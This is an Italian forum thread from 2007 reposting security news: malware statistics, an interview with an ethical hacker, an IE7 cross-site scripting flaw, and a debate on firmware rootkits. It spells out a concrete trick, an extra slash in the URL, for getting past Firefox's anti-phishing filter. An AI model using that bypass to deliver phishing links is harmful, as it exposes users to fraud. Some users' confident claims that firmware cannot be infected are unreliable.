Dalle statistiche stilate dai SophosLabs risulta che a gennaio 2006 circa la metà di tutte le mail infette conteneva spyware, mentre nel 40% circa dei messaggi erano contenuti collegamenti a siti web ospitanti trojan downloader. A dicembre 2006 la situazione si è ribaltata: i messaggi contenenti link a siti Internet infetti costituivano oltre il 50% di tutte le mail dannose, mentre il 42% circa dei messaggi conteneva spyware. Secondo gli esperti di sicurezza informatica, questa tendenza è destinata a restare invariata nel 2007 e oltre.

Le proporzioni su base annua tra spyware e trojan sono simili anche per Panda, che lo scorso anno, per mezzo del suo servizio ActiveScan, afferma di aver registrato un'incidenza rispettivamente del 33 e del 25%

"L'obiettivo degli autori dei codici maligni è quello di ottenere denaro. In quest'ottica spyware e trojan sono i due strumenti più idonei. Da qui si comprende l'ampia diffusione", ha detto Corrons di Panda. "Gli altri tipi di malware sono molto lontani da queste due categorie: 6% i worm, 5% i dialer, 3% i bot. Uno degli aspetti più curiosi in questo panorama è costituito da un 24% di infezioni che sono riconducibili a virus, cookies etc. Ciò ci fa supporre che esiste una pericolosa e considerevole frammentazione del malware".

I dati raccolti da Sophos rivelano che il 30% di tutto il malware proviene dalla Cina. Si tratta per lo più di backdoor trojan, programmati per consentire agli hacker di accedere ai computer delle ignare vittime. "È sorprendente - afferma Sophos - come il 17% del malware prodotto in Cina venga creato con l'obiettivo specifico di rubare le password dei giocatori on line". Al contrario, gli autori di malware che operano in Brasile, cui va attribuita la paternità del 14,2% di tutto il malware, puntano a sottrarre le informazioni di accesso ai conti bancari on line.

"È interessante notare come il malware differisca a seconda del luogo di origine, sfruttando spesso le tendenze Internet in auge in un dato Paese e in un dato momento. Pertanto, identificandone la provenienza, gli esperti della sicurezza e le autorità sono in grado di tracciare l'identikit degli autori e di assicurarli alla giustizia", ha commentato Narisoni.

Nel 2006 Sophos ha identificato 41.536 nuovi malware, quindi il numero complessivo di minacce da cui le soluzioni Sophos sono in grado di proteggere è salito a 207.684. La quota dei trojan è stata quattro volte superiore a quella dei virus e worm specifici di Windows. Infine, dal 2005 al 2006, il volume di mail infette è sceso da una mail su 44 a una mail su 337.

Anche Fortinet ha pubblicato un rapporto delle minacce di febbraio consultabile qui (http://www.fortiguardcenter.com/reports/roundup_feb_2007.html).


punto-informatico

juninho85
03-03-2007, 14:01
sembrerebbe bello tosto questo stormworm :eek:

raffree
04-03-2007, 15:57
Come si fa ad eliminare dal pc il worm Bagle?

giannola
05-03-2007, 06:39
Come si fa ad eliminare dal pc il worm Bagle?

non è questa la sede più opportuna.

juninho85
06-03-2007, 19:25
Nell'anno appena passato abbiamo visto una crescita esponenziale di applicazioni maligne che hanno contaminato migliaia di computer in tutto il mondo. E' legittimo chiedersi a questo punto perchè e come tutto questo avvenga. Abbiamo assistito allo sfacelo che Link Optmizer (alias Gromozon) ha causato e a tutte le varianti che il malware ha presentato.
Oltre a questo ho avuto modo di vedere in vari forum come sia semplice attribuire la colpa agli Hackers.
Sembra proprio che la figura dell'Hacker sia diventata di moda, ma credo che non sia chiaro cosa significhi il termine Hacker. Troppo spesso si legge nelle varie sezioni security di tanti forum "penso proprio che un Hacker sia entrato nel mio computer" oppure come nel caso sopra esposto di Gromozon si ricorra all'appellativo Hacker per definire un gruppo o un team di programmatori che sviluppano un codice malevolo col solo scopo di arrecare danno a migliaia di utenti.
Ma lo scopo di questo articolo non è quello di parlare di questo genere o gruppo di persone, ma bensì di coinvolgere veri Hacker, per sentire direttamente da loro come sia possibile raggiungere un discreto grado di sicurezza del nostro sistema, e su come utilizzare al meglio il nostro computer.

I media hanno sempre descritto questa figura in maniera un po' ambigua, ci sono sempre stati presentati come dei criminali informatici, e sembra che siano loro gli artefici di qualunque cosa succeda in rete. Io direi che è giunto il momento di cominciare a conoscerli!
Finora è sempre stato associato al termine Hacker la filosofia di pirata informatico, ma negli ultimi anni si sta diffondendo una cultura diversa chiamata Ethical Hacking, che rappresenta un gruppo di Hacker, esperti in sicurezza, che hanno creato una nuova forma di hacking, rappresentata da un insieme di specialisti che eseguono attacchi a vari sistemi, senza però arrecare danni o sottrarre informazioni riservate.
In pratica eseguono delle simulazioni e redigono dei report che consegneranno ai legittimi proprietari in cui evidenziano le falle nei loro sistemi e sopratutto propongono le soluzioni da adottare per proteggersi. In rete ho avuto modo di leggere che queste azioni sono illegali in quanto esiste una violazione del sistema, ma tralasciamo per un attimo questo aspetto che non è lo scopo del nostro articolo, cerchiamo di apprendere come questo può essere visto ed utilizzato come un vantaggio per noi tutti.
Sulla base di quanto appena citato mi sono chiesta "Perchè non sentire direttamente qualcuno di loro in merito alla sicurezza dei sistemi?"; potrebbe essere utile a tutti sentire un parere direttamente da questi specialisti su come utilizzare al meglio il nostro computer, quale tecniche di difesa possiamo adottare e quali software possiamo installare per rendere più difficile il compito di coloro che attentano alla nostra sicurezza informatica.

Ho contattato uno di loro, il suo nik è Franz, è uno dei cofondatori del sito HackerAlliance.net ed appartiene a un gruppo di Ethical Hacker; prima di continuare col prosieguo dell’articolo, e vista la disponibilità in merito alla mia richiesta, cerchiamo di conoscerlo meglio:


Alex : Ci parli un po’ di te?
Franz : Lavoro in ambito di gestione di una rete LAN gigabyte (2 giga ridondati con dei servers da 100 terabytes) che serve circa 5 Laboratori (non posso essere più specifico perdonate), con routers, pix firewall con accessi sia intranet (Lan aziendale) che esterni, da tutta Italia passando tramite delle access list gestite da dei Pix. Conosco benissimo quali possono essere sia le problematiche interne ed esterne di accesso, ho un passato, ma ancora presente in alcuni casi di Hacker, sempre nel senso buono del termine.
Alex : Perchè sei diventato un Hacker?
Franz : Diciamo per curiosità, voglia di imparare, di capire con che cosa si ha che fare, un po' come fanno alcuni bambini che appena ricevono in regalo qualche giocattolo lo smontano. La differenza è che loro lo fanno senza un motivo, gli Hackers hanno come motivazione principale quella di capire con cosa hanno a che fare, poi in genere cercano di aiutare gli altri a capire, ma anche qui dipende dalla persona:
- C’è chi tende a tenere tutto quello che capisce/comprende per sé
- C’è chi tende a condividere le informazioni (credo questo sia lo spirito giusto)
Alex : C’è stato qualche caso o filmografia che ti ha influenzato ad interessarti di questo campo "Oscuro" dell'informatica?
Franz : Nel mio caso ha influito molto il film Wargames [giochi di guerra], poi diciamo la mia prima appartenenza ad un gruppo è nata come gruppo di attaccanti verso siti pedopornografici.
Alex : So che esistono delle categorie di Hacker, quali sono e come si distinguono tra di loro?
Franz : Ci sono 2 categorie nel gruppo degli Hackers, gli White hat [http://www.whitehat.com.au] e i Black hat [http://www.blackhat.com]; cosa li distingue?
Direi che è facile i bianchi sono i buoni, ....ma non sempre il colore indica i buoni ed i cattivi, diciamo che dipende.
Alex : Quale ritieni sia la minaccia più diffusa oggi nella rete e perchè?
Franz : La più grande minaccia della rete attualmente è l'ignoranza, cerco di spiegarmi meglio:
- Molta gente non sa neanche cosa sia Windows Update anche se usano il sistema operativo Windows;
- Molti hanno un antivirus, ma non lo aggiornano periodicamente, per cui è come non averlo;
- Firewall questo sconosciuto: ne esistono di efficaci anche gratuiti (parlando di firewall software non Hardware) che ti danno una prima indicazione se sul tuo pc c'è un traffico "anomalo" di dati in entrata/uscita.
Alex : Potresti spiegare meglio questo aspetto?
Franz : Mah ….. io vedo che molti non danno una grande importanza alla sicurezza del proprio PC; come ho appena detto quelle poche regole basilari che tanto vengono sbandierate in vari siti sono poi proprio ignorate, e per molti sembrano non avere alcuna importanza. L’ignoranza informatica è molto più diffusa di quanto si creda e la formazione informatica degli utenti è importante, anzi importantissima; molti non sanno usare il computer, altri lo sanno utilizzare in maniera davvero superficiale, di conseguenza è facile capire il perché delle numerose epidemie di virus, worm etc..
Alex : Allora il problema più grosso nella sicurezza informatica sono gli utenti?
Franz : Per me si, quando uno non vuole la pappa pronta, ma studia prova e sperimenta rischiandoci del suo, magari chiedendo aiuto in qualche forum, ma sopratutto legge prima di postare, non si atteggia a superuomo per poi porre quesiti deficenti, ma porta rispetto a chi ne sà qualcosa in più di lui, è disponibile ad ascoltare, non è presuntuoso ma con umiltà cerca di apprendere quello che non sa …… allora il discorso cambia. Posso citare qualche esempio pratico. Qualche tempo fa venne nei nostri laboratori un’azienda abbastanza grande, una multinazionale nell’ambito dell’informatica per fare dei test su degli apparati connessi in rete. Dopo qualche ora mi contattano telefonicamente (mi avevano chiesto degli accessi IP fissi cosa che ho provveduto a fare) dicendomi che i loro PC di test si riavviavano in continuazione. Domando: “Ma che PC avete?” ; "Pentium ... bla bla ... "; "Si va bene" aggiungo io "Meglio che vengo a vedere!". Immaginate un po’ trovarvi di fronte a dei PC con XP senza nessun Service Pack o aggiornamento di alcun tipo attestati su una rete LAN che a sua volta vede internet (con dei firewall ovviamente). E ti credo che avevano problemi: i PC si riavviavano continuamente per via del worm Blaster che non solo avevano loro ma che mi hanno appestato tutta la rete LAN (ininfluente per chi era patchato correttamente).
Alex : Si, ma non sono tutti così! Ci sono anche utenti che non sono preparati!
Franz : beh …… in giro c’è di tutto sai ……. chi fa domande stupide, a causa della mancata conoscenza dell'argomento e delle nozioni basilari o che non segue quello che abbiamo poco sopra citato … non ci vuole mica un Hacker sai, fa tutto da solo; questo è un comportamento irresponsabile. Una volta c’erano molti meno problemi in quanto l’accesso in rete (Internet) si pagava e pure caro. Era molto più controllato, chi veniva in rete ci veniva con cognizione di fatto. Adesso l’accesso ad internet ci manca solo che lo dia anche Sorrisi e Canzoni.
Alex : Non è che adesso ne fai di tutta un’erba un fascio?
Franz : A tutti può capitare di scivolare, di commettere un errore, magari banale che non può essere nemmeno preso in considerazione (la prima esperienza in rete prima di diventare un ethical hacker e’ quella del defacer/cracker)…… dicevo … che anche se le procedure sono conosciute il pericolo si annida nella disattenzione, ma l’utente informatico sa poi come risolvere la situazione in ogni caso, se si è messo in pericolo con le proprie mani. La fase del “Lato oscuro” all’inizio ti affascina. E’ il modo più “facile” di apparire in rete.
Alex : Disapprovo anche se capisco ....... forse.
Franz : La tentazione della via più facile prende tutti ... solo poi ti rendi conto che non era quello che volevi.
Alex : Ma allora la sicurezza cos’è, o meglio da dove passa?
Franz : Passa dalle regole che abbiamo parlato prima, e l’insicurezza passa dalla fretta dalla disattenzione o dalla stupidità; ultimamente episodi di phishing, tecniche di social engineering sono diventate pure routine, sono troppi gli utenti che hanno abbassato la guardia o che bellamente continuano come se niente fosse; come dico spesso questi sparano nel mucchio, vuoi che su 10.000 email inviate non ci siano 100 che abboccano?
Alex : Etica Hacker, per te cosa rappresenta e come la potresti rappresentare con un esempio pratico?
Franz : L’etica consiste che se per caso o “volutamente” si scopre una falla in un sito/sistema che possa causare l’intrusione altrui lo si segnala al gestore, senza causare danni. Da precisare che spesso la cosa non fa piacere al gestore stesso che o non ti risponde o ti dice “fatti gli affari tuoi” oppure “ti denuncio”.
Alex :Secondo me i mass media hanno generalizzato troppo sul fenomeno Hacker associandolo al termine di “pirata informatico” e estendendo certe peculiarità del “pirata” a tutto il mondo dell’underground; tu come vedi questo aspetto?
Franz : Non si può negare che negli ultimi tempi ci sono stati numerosi attacchi a sistemi informatici, defacement, frodi informatiche ecc... il problema è che non bisogna incolpare di tutto gli Hacker, è anche vero che un Hacker ha tutte le conoscenze necessarie per fare gli atti di cui sopra, tuttavia la nostra attenzione è rivolta altrove ...
Alex :Dici che è rivolta altrove, cioè dove?
Franz : …..è rivolta altrove, punto finisce lì la frase. Posso solo aggiungere che per compiere azioni come quelle citate, non ci vuole certo un Hacker, è sufficiente avere delle buone conoscenze informatiche, il resto lo fa chi usa il PC, molte persone usano il computer solo come un mezzo e non come un fine e quindi hanno una conoscenza della propria macchina molto limitata, ne risulta che le persone normali sono maggiormente esposte ai pericoli della rete e non seguono le basilari regole di protezione …… mi sembra di averlo già detto …… o no?
Alex :Però non vedo una vostra “presa di posizione” in merito a quanto viene scritto un po’ dappertutto sugli Hackers?
Franz : Mi fa andare fuori dai gangheri vedere gente che riesce a malapena ad accendere il computer che parla di Hacker, denigrando e infangando una categoria di persone e una tradizione orgogliosa, considerando criminali da quattro soldi quelli che hanno costruito Internet, i fondatori del www e paragonano la nostra conoscenza informatica con quella di una massaia che fa le tagliatelle ……. , noi siamo qui e continuiamo a tenere in piedi le cose, è grazie a noi se voi riuscite ad acquistare online, eppure paragonate la nostra opera alle catene di Sant'antonio, allo spam, ai defacement etc……per te è poco??. Un’altra cosa….. è tempo di finirla con la caccia agli Hacker, è tempo sprecato e non ha senso, non siamo una razza diversa, non ci riconoscerete dal modo di vestirci, dai nostri hobby, siamo come voi, una cosa però abbiamo di diverso, Alex …… noi ci chiediamo il perché delle cose.
Alex :Ho toccato un tasto delicato, scusami!
Franz : No … ma il concetto di Hacking è quello di esplorare, conoscere i limiti delle cose e creare qualcosa di nuovo, magari essere anche in grado di stupire. Ricordo una frase di J.F. Kennedy diceva “ Alcuni vedono le cose come sono e dicono : Perché? Io sogno le cose che non sono mai state e dico : Perché no?” Solo perché qualcosa non sia mai stata fatta prima non dovrebbe impedirti di tentare a farlo, anzi dovrebbe essere preso come una sfida, uno stimolo a confrontarti e ogni volta che ti chiedi se è possibile fare qualcosa, l’unica risposta giusta è "Provarci".
Alex: Noto che c'è stata una grande evoluzione nelle tecniche usate dai pirati informatici; allo stato attuale come consigli di agire?
Franz : Direi anzi che c'è stato un peggioramento, ormai il vero "Hacker" nel senso del termine si è quasi estinto quelli che agiscono adesso sono quasi tutti Crackers/Lamer …. E chiudiamo così questo aspetto …..[http://www.zeusnews.it/index.php3?ar=stampa&cod=5311]
Alex : La pirateria informatica, a parte l'intrusione nei sistemi altrui come si lega con il P2P? Ovvero la Cassazione di recente ha assolto 2 studenti che scaricavano files protetti...la legge Urbani quindi non è più valida?
Franz : Leggendo vari articoli sembra che l’assoluzione sia dovuta al fatto che quanto accaduto era precedente alla legge Urbani, ma … le regole sono fatte per essere violate, o no?
Alex : Se non sono indiscreta quale metodo utilizzi per violare un sistema?
Franz : Qui la risposta non può essere unica, non c'è un metodo "standard" dipende da molte cose. Diciamo che il primo step è quello di acquisire più informazioni possibili sul "bersaglio" con vari sistemi, ne ho citato sopra uno dei più comuni, ovvero la scansione delle porte, poi si può procedere in vari modi in base al risultato:
a) Il bersaglio è protetto da un firewall scansione delle porte non porta ad alcun risultato.
b) Un tracciamento mediante contatto magari inviando una semplice e-mail all'eventuale webmaster e poi in base alla risposta (se avviene) tracciare il percorso della e-mail
c) Si riesce a sapere il tipo si sistema operativo e altro software che utilizza il bersaglio
d) Si cercano delle falle non patchate del sistema operativo in questione (i cosiddetti zero-day)
E mi fermo qui......
Alex : Che consiglio dai agli utenti per proteggere al meglio i loro sistemi?
Franz : Mi sembra che ne abbiamo già ampiamente parlato, per la difesa direi poche semplici regole:
- Usare il cervello è la prima, mai aprire allegati anche se si conosce il mittente salvo vi abbia avvisato dell'invio di qualche cosa. (Anche se non e’ vero neanche questo)....tempo fa un collega mi dice..ho ricevuto una email strana da uno del commerciale che dice che mi ama ma non riesco ad aprirla forse perche’ non ho visual basic installato puoi provare ad aprirmela tu? Io dico ok...ecco come ho conosciuto il worm I LOVE YOU (antivirus aggiornato al giorno prima). Da quel momento non mi sono più fatto fregare né da amici che nemici.
- Un antivirus non aggiornato non è più valido.
- Scansioni periodiche antispyware, ed evitare di usare browser ufficiali come Explorer sono i primi ad essere infettati, usare browser alternativi come Firefox ed Opera (a breve torna anche Netscape).
- Poi quanto riportato qualche domanda fa, ….. l’ignoranza informatica, credo che questo sia il punto focale di tutto il discorso.
Concludiamo questa intervista con delle brevi considerazioni in merito a quanto abbiamo esposto.

Non so se sia una mia impressione, ma ho notato come siano cambiate le cose domanda dopo domanda. All'inizio sembrava un argomento destinato solo ad un'utenza "specializzata" e la premessa presentava anche una vena nostalgica dell'etica Hackers. Abbiamo anche visto gli aspetti dell'Hacking: uno trasgressivo, ma al tempo stesso che non fa danni e si limita alla segnalazione e l'altro di pirata informatico puro, che cerca solo di distruggere, ma nel prosieguo ho potuto notare come gli argomenti si siano evoluti e plasmati a quello che poi è apparso come tema dominante, cioè la sicurezza del sistema, incentrata sull'utilizzatore del PC.

Mi sembra inoltre che gli argomenti trattati ed esposti siano interessanti e alla portata di tutti; molti aspetti gli abbiamo già toccati in varie discussioni nel nostro forum, ma non erano mai stati legati tra loro; abbiamo anche sentito quali siano i rischi maggiori e sopratutto che contromisure adottare. All'inizio pensavo di non avere nessuna risposta, oppure di avere delle risposte prettamente tecniche, del tipo che la sicurezza vada costruita con un insieme di software, di modifiche varie al sistema, ma invece ho potuto constatare che la parte predominante sia un'altra.

Tempo fa ho letto in rete una frase che diceva "Il problema sta sempre tra il monitor e lo schienale della sedia" e mi sembrava una battuta o una frase fatta, ma anche Kevin Mitnich in qualche intervista ha più volte affermato che "l'anello debole della catena è il fattore umano". Con questo non voglio mettere in rilievo o enfatizzare i problemi che possono avere gli utenti poco esperti, ma cercare di rendere il più possibile comprensibile le problematiche inerenti la nostra sicurezza, ampliandone le prospettive e dare delle indicazioni utili ai lettori, soprattutto a quelli meno esperti e alieni ai concetti come software, computer, internet e sicurezza. Io credo fermamente che diffondere le conoscenze e le informazioni, sia il primo e vero passo verso una discreta sicurezza informatica, proprio oggi in cui l’informazione è il bene più prezioso, ma molti si fermano alla paternità della notizia, altri addirittura protestano perché hanno diffuso prima la notizia stessa. Ma quello che veramente manca è un bacino in cui poter "pescare" sia le notizie ma anche trovare un dibattito con risposte concrete ai vari problemi. La sola notizia non porta ad un'evoluzione dell'utente poco esperto che certe terminologie per lui sono incomprensibili, ma serve un filtro, un punto di riferimento per tutti che possa guidare indistintamente sia utenti esperti che utenti poco esperti in questo processo di evoluzione che deve essere attuato.

Proprio sulla base di quanto sopra noi ci proponiamo in quello che potrebbe essere il progetto più interessante ed ambizioso che si possa trovare in rete. Tutti pensano ad incrementare l'afflusso dei propri utenti con sezioni dedicate alla sicurezza, sull'onda di infezioni famose, tipo Gromozon; sono addirittura sorti siti e forum che si occupano solo di questo. Ebbene questo non è altro di più sbagliato che possiamo fare, sembrerà la mia una presa di posizione a favore di una determinata "politica" di prevenzione e a sfavore di una soluzione immediata del problema, ma credetemi che una volta che è stato ripulito il sistema se non si adottano delle regole di comportamento e delle appropriate configurazioni ai software di difesa si ricasca nel problema.
In ultima analisi molti predicano che "prevenire è meglio che curare", ma in realtà non lo fanno, si fermano su concetti di bassa cultura al solo scopo di incentivare le visite ma pochi si propongono come punto di riferimento a soluzione del problema. Noi non abbiamo preconcetti dominati che pongono le basi su quale software consigliare, possiamo però mettere al servizio di tutti quello che stiamo facendo, cioè la nostra esperienza tradotta e semplificata in poche regole e piccole configurazioni ai vari software che ci hanno portato finora ad evitare infezioni ed a una navigazione in tutta tranquillità.

Concludo dicendo che se con questo articolo troverete delle risposte e finito di leggerlo vi sentite colmi di sicurezza e certi di aver compreso il vero obbiettivo da raggiungere, beh .... credo proprio di aver fallito, io spero che vi sentiate delusi e spero che questo stato d'animo vi porti a dire la vostra, in quanto non è abbastanza quanto esposto e che vi spinga ad agire, uscendo dal guscio protettivo o da quella illusoria sicurezza che il software X o il software Y vi possono a malapena garantire. Io spero che qualcuno di voi riesca a prendersi un suo spazio per elaborare quanto ho scritto, magari migliorare ed ampliare questi concetti e gli aspetti che abbiamo presentato. Noi ci proponiamo come valida alternativa, indipendente e libera da vincoli di ogni sorte, ma con il solo scopo di portare un beneficio a tutti ....!

Se a qualcuno queste poche parole di conclusione non piaceranno, meglio! Vuol dire che ho colto nel segno! Se invece altri vogliono mettersi in discussione e approfondire l'argomento nel nostro sito troveranno molto materiale adatto per risolvere o minimizzare il problema. Penso che sia chiaro che non è demonizzando il problema che troviamo la soluzione, ma è solo con la consapevolezza che esiste. E' solo con l'impegno e la costanza che possiamo ambire a livelli evolutivi che magari ora sembrano solo un'utopia. Per questo ci proponiamo come esempio da seguire, o con altri articoli in merito o semplicemente seguendo attivamente le nostre discussioni nel forum in merito al problema. Tutto questo sarà frutto di test, prove ed esperienze che noi abbiamo eseguito. In sostanza possiamo offrire una soluzione basata sulla nostra esperienza e, credetemi, questo non è un palliativo per cercare quello che abbiamo già, non ricorriamo a politiche di bassa cultura per incentivare le già innumerevoli visite che abbiamo quotidianamente, ma solo e semplicemente ... vogliamo essere il punto di incontro tra il problema e la soluzione.


tratto da swzone.it

juninho85
15-03-2007, 21:40
IUnternet Explorer 7.0, sia su piattaforma XP che su Vista, risulta vulnerabile ad una particolare tecnica che alcuni malintenzionati potrebbero sfruttare per mettere in atto frodi online e phishing. Il phishing è l´ultima frontiera delle frodi on-line, con la quale i pirati informatici tentano di carpire user-name e password di ignari utenti, per la connessione a siti generalmente di istituti bancari.
Il phishing è una tecnica che generalmente, sfrutta l´invio di una finta mail che sembra provenire dal nostro istituto bancario, nella quale ci viene richiesto di inserire user e password di accesso.


Il browser made in Microsoft sarebbe interessato da una vulnerabilità di tipo cross-site scripting, stando alla dichiarazione dello scopritore del bug, Aviv Raff programmatore ed esperto di sicurezza.

Il problema è insito nella pagina locale "navcancl.htm". Una pagina che viene caricata dal browser stesso quando un sito risulta essere irraggiungibile, ma che se fosse stata contraffatta potrebbe portare la vittima ad un sito esterno maligno.

Tale pagina presenta al proprio interno uno script, generato dal sistema quando una pagina internet risulta non raggiungibile, che consente il refresh della stessa.
http://www.pianetapc.it/img_news/ie7bug.jpg

Un malintenzionato potrebbe, attraverso la tecnica del cross-site scripting iniettare uno script nel link "aggiornare la pagina" ed eseguire di conseguenza attacchi mirati di phishing, ma fortunatamente non l´esecuzione di codice arbitrario in remoto.

Tale attacco potrebbe permettere ad un hacker di re-indirizzare le proprie vittime verso pagine del tutto simili a quelle di istituiti bancari o postali.

fonte:pianeta pc

juninho85
15-03-2007, 21:41
ok...anche il nuovo IE pieno di falle,sto pishing poi,dù balle...meno male che uso firefox :sborone::read:

juninho85
15-03-2007, 21:43
Mentre la notizia del Bug di Internet Explorer 7 farà il giro del "mondo" riempiendo le pagine dei media e dei siti che si occupano di internet e di sicurezza informatica, quella che Firefox dopo 3/4 mesi presenta ancora gravi falle non corrette non la considererà nessuno. D´altronde parlare di Microsoft fa più "ascolti".

Ebbene si, Firefox il browser di casa Mozilla, non è più - almeno ultimamente - il "super browser" super-sicuro e super-aggiornato.

Già nel mese di dicembre 2006, Kaneda un ricercatore indipendente, aveva privatamente segnalato una pericolosa falla nel modulo anti-phishing di Firefox 2.0.0.1, al team di Mozilla.

Agli inizi di febbraio visto che non erano pervenute risposte da Mozilla stessa, l´esperto aveva deciso di rendere nota la vulnerabilità.

Oggi exploit.blogosfere.it fa giustamente notare come nella versione 2.0.0.2 tale falla non sia ancora stata risolta.

"Il problema nella protezione phishing segnalato su bugzilla nel mese di gennaio interessava Firefox 2.0.0.1. Con il rilascio della versione 2.0.0.2 sono state corrette importanti vulnerabilità di sicurezza ma il bug nella protezione phishing non è stato ancora risolto.

Fate attenzione quando cliccate su un collegamento che sembra appartenere ad un dominio legittimo, per bypassare il filtro anti-phishing di Firefox basta aggiungere un carattere "/" in più dopo il nome del dominio, questo link conduce l´utente a una pagina creata dagli sviluppatori Firefox per dimostrare il funzionamento del filtro anti-phishing integrato nel browser.

Cliccando sul collegamento Firefox ci avvertirà che la pagina che stiamo visitando potrebbe essere una contraffazione.


* http://www.mozilla.com/firefox/its-a-trap.html


Se aggiungiamo un carattere "/" in più, Firefox si accorgerà che l´url non è scritto in forma corretta, provvederà a correggere l´errore e aprirà il medesimo url riconoscendo la pagina come legittima.


* http://www.mozilla.com/firefox//its-a-trap.html

Fate molta attenzione, con questa tecnica i siti truffaldini ingabbiati nella blacklist di Firefox sono in libertà provvisoria."

La cosa è ancora più grave del previsto purtroppo. Da una prova che abbiamo eseguito quest´oggi il problema non si ferma all´ultima versione stabile di Firefox, ma si estende anche all´ultima RC (release candidate) 2.0.0.3. Sembrerebbe infatti che l´ultima versione del browser di Mozilla Foundation soffra ancora della stessa falla. Come dire che 4 mesi non sono bastati per mettere mano al codice.

fonte:pianeta pc

giannola
16-03-2007, 05:35
ok...anche il nuovo IE pieno di falle,sto pishing poi,dù balle...meno male che uso firefox :sborone::read:

quando si dice smentirsi da soli eh ? :sofico: :ciapet:

Quand'è che capirete che il browser sicuro è quello che non permette di navigare ?:D

c.m.g
16-03-2007, 09:18
opera docet!!! :D

juninho85
17-03-2007, 21:53
I rootkit infetteranno l’hardware
Un esperto di sicurezza lancia l’allarme sulla possibile “mutazione genetica” dei malware invisibili, da problema esclusivamente software a ibrido capace di infettare i PC in maniera ancora più radicale.

Come abbiamo riportato recentemente, le società di sicurezza sostengono che i rootkit in grado di camuffarsi in maniera molto efficace all´interno dei sistemi Windows sono un problema in crescita esponenziale. Ma la situazione pare potrebbe peggiorare ancora, con rootkit ancora più invisibili di quelli da kernel, nascosti all´interno delle schede di espansione montate sulla motherboard dei PC.

Ne ha parlato John Heasman, ricercatore per NGSSoftware, durante la conferenza Black Hat DC recentemente tenutasi negli States. Heasman getta una luce obliqua sul "possibile punto di sviluppo" degli hardware rootkit, potenzialmente in grado di nascondersi all´interno dei firmware delle schede PCI. Il suddetto firmware, parimenti al BIOS di sistema, si aziona all´accensione del PC prima ancora che venga caricato un qualsivoglia sistema operativo.

Un rootkit in grado di copiarsi all´interno di uno di questi firmware potrebbe agire indisturbato, lasciando ben poche possibilità al sistema operativo e ai software di sicurezza di individuare la sua invisibile presenza all´interno della macchina colpita.



In particolare per Heasman le periferiche più "pericolose" da questo punto di vista sono le schede video progettate per bus PCI, AGP e PCIe. I loro firmware, secondo le ricerche dell´esperto, sono "porosi" all´upload di alcuni kbyte di codice esterno, molto poco ma sufficiente a rendere concreta la prospettiva dei rootkit in hardware.

Il futuro ci dirà quanto questa prospettiva possa essere reale: per ora, gli attacchi mirati all´hardware sono stati scarsi e poco efficaci. Ma la quasi-leggenda metropolitana del W95.CIH, potenziale distruttore di BIOS anche noto come Chernobyl datato 1998, dimostra che non è consigliabile abbassare la guardia neanche su questo fronte.

Fonte : Megalab.it

giannola
18-03-2007, 06:40
beh su questo perdonami ma sono scettico.
Mi pare adesso si voglia fare del sensazionalismo, più per distogliere l'attenzione dalle forme di attacco tradizionali che per un reale pericolo, un po come si fa nelle email spam di segnalazione del pericolo che creano catene di sant'antonio.

Intanto bisogna capire cos'è il malware altrimenti nn c'è che da discutere.
Che è un programma è un dato di oggettivo e che deve andare in esecuzione, ovvero risiedere nella memoria centrale ed essere processato dalla cipiù è una altro fatto assodato.

Dunque stiamo parlando di SW.
Ma questo sw quando non è in esecuzione deve essere salvato da qualche parte, il codie del programma, i suoi parametri aggiornati devono essere scritti da qualche parte.
Non c'è dubbio che al momento l'unico hw che può essere perennemente infetto è l'hd.
Di certo non la memoria centrale o la ram della scheda video, entrambe volatili, ovvero che si cancellano allo spegnimento del pc.

Non la cache del processore, anch'essa volatile e relativamente piccola e difficilmente un virus moderno troverebbe spazio nella rom del bios a meno di non voler sovrascrivere completamente il bios stesso.

Dunque dove mai potrebbe risiedere ?
A meno di non voler rischivere i manuali dell'informatica dando degli imbecilli a coloro che pensavano che gli uni e gli zeri potessero essere memorizzati solo su supporti magnetici, da nessun'altra parte.

Altro è invece la possibilità di far danni all'hw.
Quella è invece una probabilità reale.
Come ad esempio bypassare i controlli di temperatura e portare il microprocessore al surriscaldamento.

demetriol
19-03-2007, 14:43
Beh, sono d'accordo... Non credo si possa infettare una scheda video!

juninho85
19-03-2007, 14:48
chissà...

giannola
19-03-2007, 15:42
Beh, sono d'accordo... Non credo si possa infettare una scheda video!

direi che non è materialmente possibile.

Il virus può modificare i settaggi, ma non ha una memoria permanente in cui stare.

giannola
19-03-2007, 15:43
chissà...

si e le marmotte incartano il cioccolato.:D

Nn ce l'ho con te personalmente, ma nemmeno tu dovresti farti trascinare in queste illazioni fantasiose.;)

juninho85
19-03-2007, 15:53
si e le marmotte incartano il cioccolato.:D

Nn ce l'ho con te personalmente, ma nemmeno tu dovresti farti trascinare in queste illazioni fantasiose.;)
non mi sembra del tutto campato in aria...supponiamo di avere il pc infetto da un qualche malware/rootkit o chissà cosa,che trasferisca del codice presente nell' hard disk verso qualche periferica(tipo unità cd o video) durante la fase di avvio...anche se effettivamente dovrebbe essere qualcosa di piccolissimo per potersi insediare in un bios o firmware

giannola
19-03-2007, 16:07
non mi sembra del tutto campato in aria...supponiamo di avere il pc infetto da un qualche malware/rootkit o chissà cosa,che trasferisca del codice presente nell' hard disk verso qualche periferica(tipo unità cd o video) durante la fase di avvio...anche se effettivamente dovrebbe essere qualcosa di piccolissimo per potersi insediare in un bios o firmware

appunto a parte la rom del bios sulla scheda madre e dell'hd (escludendo floppy e chiavette usb), mi specificheresti su quale altro altro supporto hw potrebbe risiedere un virus per sopravvivere allo spegnimento del pc ?

In ogni caso non ha molto senso che un virus rootkit perda tempo a caricarsi su una memoria volatile di qualche componente se può fungere da macchina virtuale e controllare tutte le funzioni comprese quelle di sicurezza in modo da non essere rilevato.

juninho85
19-03-2007, 22:27
appunto a parte la rom del bios sulla scheda madre e dell'hd (escludendo floppy e chiavette usb), mi specificheresti su quale altro altro supporto hw potrebbe risiedere un virus per sopravvivere allo spegnimento del pc ?
m'hai detto nulla:D
anche sulle periferiche cd/dvd potrebbe essere fattibile tramite firmware no=?
In ogni caso non ha molto senso che un virus rootkit perda tempo a caricarsi su una memoria volatile di qualche componente se può fungere da macchina virtuale e controllare tutte le funzioni comprese quelle di sicurezza in modo da non essere rilevato.
perchè non dovrebbe aver senso?pensa il disagio che potrebbe provocare a un utente non proprio smanettone che appena vede il proprio computer sfarfallare seriamente,magari per via di qualche paramentro caricato nelle rom che non fa funzionare correttamente il sistema,altro che dialer,trojan ecc ecc;)

giannola
20-03-2007, 06:55
m'hai detto nulla:D
anche sulle periferiche cd/dvd potrebbe essere fattibile tramite firmware no=?


certo ho detto nulla.
